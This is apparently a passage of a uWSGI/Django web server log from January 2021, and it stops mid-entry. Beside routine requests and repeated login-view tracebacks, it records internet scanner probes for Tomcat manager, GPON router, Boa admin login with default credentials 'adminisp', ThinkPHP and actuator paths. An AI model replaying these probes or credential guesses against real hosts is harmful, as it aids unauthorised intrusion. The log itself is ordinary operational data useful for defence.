[Sun Jan 10 16:06:16 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 12823|app: 0|req: 736/1009] 37.46.150.7 () {22 vars in 224 bytes} [Sun Jan 10 16:18:12 2021] HEAD / => generated 52526 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 737/1010] 83.97.20.34 () {26 vars in 278 bytes} [Sun Jan 10 16:20:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 738/1011] 101.251.238.50 () {32 vars in 507 bytes} [Sun Jan 10 16:23:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 739/1012] 83.97.20.21 () {26 vars in 277 bytes} [Sun Jan 10 16:43:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +invalid request block size: 26451 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 220.194.106.61 client_port: 48890] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[uwsgi-http key: client_addr: 61.219.11.153 client_port: 47868] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +[pid: 12823|app: 0|req: 740/1013] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 18:09:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 12823|app: 0|req: 741/1014] 89.248.168.108 () {22 vars in 227 bytes} [Sun Jan 10 18:19:35 2021] HEAD / => generated 52529 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 742/1015] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 18:47:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 743/1016] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 18:49:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 744/1017] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 19:26:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 745/1018] 177.11.232.73 () {28 vars in 410 bytes} [Sun Jan 10 19:30:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 746/1019] 83.97.20.29 () {26 vars in 278 bytes} [Sun Jan 10 19:53:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 747/1020] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 20:07:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 748/1021] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 20:43:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 749/1022] 89.177.20.163 () {28 vars in 410 bytes} [Sun Jan 10 20:56:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 750/1023] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 21:20:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 751/1024] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 21:56:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 752/1025] 157.245.140.3 () {22 vars in 223 bytes} [Sun Jan 10 22:00:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 753/1026] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 22:36:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 754/1027] 111.229.246.132 () {22 vars in 236 bytes} [Sun Jan 10 22:38:29 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 755/1028] 111.229.246.132 () {24 vars in 302 bytes} [Sun Jan 10 22:38:29 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /config/getuser +[pid: 12823|app: 0|req: 756/1029] 209.141.60.195 () {36 vars in 618 bytes} [Sun Jan 10 22:43:14 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 757/1030] 83.97.20.21 () {26 vars in 277 bytes} [Sun Jan 10 23:11:56 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 758/1031] 123.100.226.3 () {22 vars in 235 bytes} [Sun Jan 10 23:20:23 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 759/1032] 123.100.226.3 () {24 vars in 301 bytes} [Sun Jan 10 23:20:24 2021] GET /manager/html => generated 3401 bytes in 5 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 760/1033] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 23:50:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 761/1034] 91.221.7.24 () {28 vars in 408 bytes} [Mon Jan 11 00:18:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 762/1035] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 00:28:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /http:/www.qq.com/404/search_children.js +[pid: 12823|app: 0|req: 763/1036] 106.75.211.211 () {30 vars in 492 bytes} [Mon Jan 11 00:34:08 2021] GET http://www.qq.com/404/search_children.js => generated 1727 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 764/1037] 198.143.155.122 () {30 vars in 438 bytes} [Mon Jan 11 01:02:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 765/1038] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 01:04:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 766/1039] 119.45.195.247 () {22 vars in 236 bytes} [Mon Jan 11 01:40:24 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html/ +[pid: 12823|app: 0|req: 767/1040] 119.45.195.247 () {24 vars in 304 bytes} [Mon Jan 11 01:40:24 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 768/1041] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 01:44:56 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 769/1042] 83.97.20.34 () {26 vars in 278 bytes} [Mon Jan 11 02:16:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 770/1043] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 02:25:53 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 771/1044] 182.92.65.228 () {22 vars in 235 bytes} [Mon Jan 11 02:53:34 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 772/1045] 182.92.65.228 () {24 vars in 301 bytes} [Mon Jan 11 02:53:34 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 12823|app: 0|req: 773/1046] 89.248.168.108 () {22 vars in 227 bytes} [Mon Jan 11 02:54:13 2021] HEAD / => generated 52529 bytes in 26 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 774/1047] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 03:02:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +invalid request block size: 23708 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 183.192.179.16 client_port: 51624] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[pid: 12823|app: 0|req: 775/1048] 177.72.64.165 () {28 vars in 403 bytes} [Mon Jan 11 03:10:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /actuator/health +[pid: 12823|app: 0|req: 776/1049] 192.241.214.75 () {30 vars in 373 bytes} [Mon Jan 11 03:29:09 2021] GET /actuator/health => generated 3409 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 777/1050] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 04:19:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 778/1051] 45.76.144.219 () {32 vars in 381 bytes} [Mon Jan 11 04:19:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1052] 113.96.198.50 () {28 vars in 345 bytes} [Mon Jan 11 04:53:28 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 779/1053] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 04:57:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 780/1054] 219.228.146.244 () {38 vars in 822 bytes} [Mon Jan 11 05:05:59 2021] GET /home/ => generated 8646 bytes in 105 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 781/1055] 219.228.146.244 () {40 vars in 877 bytes} [Mon Jan 11 05:06:02 2021] GET /all-0-0-0 => generated 9504 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1056] 219.228.146.244 () {40 vars in 884 bytes} [Mon Jan 11 05:06:02 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1057] 219.228.146.244 () {40 vars in 908 bytes} [Mon Jan 11 05:06:02 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 782/1058] 219.228.146.244 () {40 vars in 881 bytes} [Mon Jan 11 05:06:07 2021] GET /all-0-0-0 => generated 9504 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1059] 219.228.146.244 () {40 vars in 884 bytes} [Mon Jan 11 05:06:07 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1060] 219.228.146.244 () {40 vars in 908 bytes} [Mon Jan 11 05:06:07 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 783/1061] 219.228.146.244 () {40 vars in 873 bytes} [Mon Jan 11 05:06:11 2021] GET /home/ => generated 8646 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 784/1062] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 05:25:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 785/1063] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 05:36:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 786/1064] 59.110.158.79 () {30 vars in 413 bytes} [Mon Jan 11 05:54:30 2021] GET /manager/html => generated 3400 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 787/1065] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 06:14:42 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 788/1066] 1.34.21.161 () {36 vars in 497 bytes} [Mon Jan 11 06:39:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 789/1067] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 06:54:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 790/1068] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 07:31:43 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /GponForm/diag_Form +[pid: 12823|app: 0|req: 791/1069] 49.143.32.6 () {34 vars in 438 bytes} [Mon Jan 11 07:37:46 2021] POST /GponForm/diag_Form?images/ => generated 3423 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 792/1070] 211.99.98.229 () {22 vars in 235 bytes} [Mon Jan 11 08:00:40 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 793/1071] 211.99.98.229 () {24 vars in 301 bytes} [Mon Jan 11 08:00:40 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 794/1072] 78.36.244.27 () {28 vars in 403 bytes} [Mon Jan 11 08:00:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 795/1073] 115.28.105.155 () {30 vars in 413 bytes} [Mon Jan 11 08:12:34 2021] GET /manager/html => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 796/1074] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 08:15:46 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +invalid request block size: 23301 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 220.194.106.61 client_port: 38542] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[pid: 12823|app: 0|req: 797/1075] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 09:00:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 798/1076] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 09:38:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +invalid request block size: 8549 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 220.194.106.61 client_port: 57841] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[pid: 12823|app: 0|req: 799/1077] 106.13.42.140 () {22 vars in 235 bytes} [Mon Jan 11 09:51:29 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 800/1078] 106.13.42.140 () {24 vars in 301 bytes} [Mon Jan 11 09:51:29 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 801/1079] 45.195.12.232 () {36 vars in 491 bytes} [Mon Jan 11 10:12:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 802/1080] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 10:18:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 803/1081] 45.5.37.30 () {28 vars in 400 bytes} [Mon Jan 11 10:19:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 804/1082] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 10:56:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /hudson +[pid: 12823|app: 0|req: 805/1083] 192.241.222.241 () {30 vars in 356 bytes} [Mon Jan 11 11:24:57 2021] GET /hudson => generated 3382 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 806/1084] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 11:38:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 807/1085] 71.6.232.4 () {30 vars in 433 bytes} [Mon Jan 11 12:03:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 808/1086] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 12:17:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /boaform/admin/formLogin +[pid: 12823|app: 0|req: 809/1087] 117.222.171.172 () {22 vars in 333 bytes} [Mon Jan 11 12:25:34 2021] GET /boaform/admin/formLogin?username=adminisp&psd=adminisp => generated 3469 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 810/1088] 83.97.20.34 () {26 vars in 278 bytes} [Mon Jan 11 12:39:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 811/1089] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 12:55:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 812/1090] 178.32.197.88 () {32 vars in 491 bytes} [Mon Jan 11 12:56:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 12823|app: 0|req: 813/1091] 195.154.63.222 () {32 vars in 514 bytes} [Mon Jan 11 13:29:06 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 814/1092] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 13:37:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 815/1093] 128.14.209.226 () {30 vars in 438 bytes} [Mon Jan 11 14:17:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 816/1094] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 14:22:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +invalid request block size: 21611 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 58.247.212.239 client_port: 51188] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[pid: 12823|app: 0|req: 817/1095] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 15:00:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 818/1096] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 15:39:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 819/1097] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 16:10:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 820/1098] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 16:16:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /ip.ws.126.net:443 +[pid: 12823|app: 0|req: 821/1099] 222.186.136.150 () {26 vars in 330 bytes} [Mon Jan 11 17:42:05 2021] CONNECT ip.ws.126.net:443 => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 822/1100] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 17:53:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 823/1101] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 17:53:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 824/1102] 188.232.121.41 () {28 vars in 405 bytes} [Mon Jan 11 18:27:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 61.219.11.153 client_port: 12281] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +[pid: 12823|app: 0|req: 825/1103] 89.208.122.220 () {28 vars in 404 bytes} [Mon Jan 11 19:03:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 826/1104] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 19:17:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 827/1105] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 20:51:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 828/1106] 183.136.225.35 () {30 vars in 411 bytes} [Mon Jan 11 21:43:41 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[uwsgi-http key: sd4404386.adsl.online.nl client_addr: 183.136.225.35 client_port: 24914] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +[pid: 12823|app: 0|req: 829/1107] 101.32.12.80 () {22 vars in 233 bytes} [Mon Jan 11 22:23:02 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html/ +[pid: 12823|app: 0|req: 830/1108] 101.32.12.80 () {24 vars in 301 bytes} [Mon Jan 11 22:23:02 2021] GET /manager/html/ => generated 3404 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 831/1109] 82.123.41.126 () {30 vars in 342 bytes} [Mon Jan 11 22:30:25 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 832/1110] 83.97.20.34 () {26 vars in 278 bytes} [Mon Jan 11 22:39:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /http:/110.242.68.4/ +[pid: 12823|app: 0|req: 833/1111] 175.152.109.102 () {40 vars in 811 bytes} [Mon Jan 11 22:48:45 2021] HEAD http://110.242.68.4/ => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 834/1112] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 23:19:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 835/1113] 78.177.245.116 () {28 vars in 404 bytes} [Mon Jan 11 23:33:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 836/1114] 198.143.155.122 () {30 vars in 438 bytes} [Mon Jan 11 23:41:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 837/1115] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 00:43:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 838/1116] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 01:39:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /TP/public/index.php +[pid: 12823|app: 0|req: 839/1117] 36.27.208.157 () {30 vars in 449 bytes} [Tue Jan 12 01:42:23 2021] GET /TP/public/index.php => generated 3421 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 